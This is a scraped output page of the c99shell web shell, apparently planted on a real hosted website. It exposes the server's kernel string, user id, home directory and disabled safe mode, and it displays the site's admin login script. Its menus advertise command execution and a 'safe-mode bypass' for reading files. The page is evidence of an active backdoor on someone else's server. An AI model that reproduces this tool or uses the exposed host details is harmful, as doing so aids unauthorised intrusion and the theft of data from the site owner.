Software: Apache. PHP/5.4.45 uname -a: Linux webm115.cluster007.gra.hosting.ovh.net 5.15.74-ovh-vps-grsec-zfs-classid #1 SMP Wed uid=763961(ebenisteaz) gid=100(users) groups=100(users) Safe-mode: OFF (not secure) /home/ebenisteaz/www/admin/ drwx---r-x |
Viewing file: login.js (878 B) -rw----r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | $(document).ready(function() { $("#login_form").validate(); $("#login_form").submit(function() { $("#msgbox").removeClass(" alert-info").addClass(' alert-block').text('Validation....').fadeIn(1000); $.post("ajaxlogin.php",{ login:$('#loginn').val(),password:$('#password').val(),rand:Math.random() } ,function(data) { if(data=='yes') { $("#msgbox").fadeTo(200,0.1,function() { $(this).html('Connexion.....').addClass(' alert-block').fadeTo(900,1, function() { document.location='index.php'; }); }); } else { $("#msgbox").fadeTo(200,0.1,function() { $(this).html(data).addClass('alert-error').fadeTo(900,1); }); } }); return false; }); $("#password").blur(function() { $("#login_form").trigger('submit'); }); }); |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c99shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | Generation time: 0.0342 ]-- |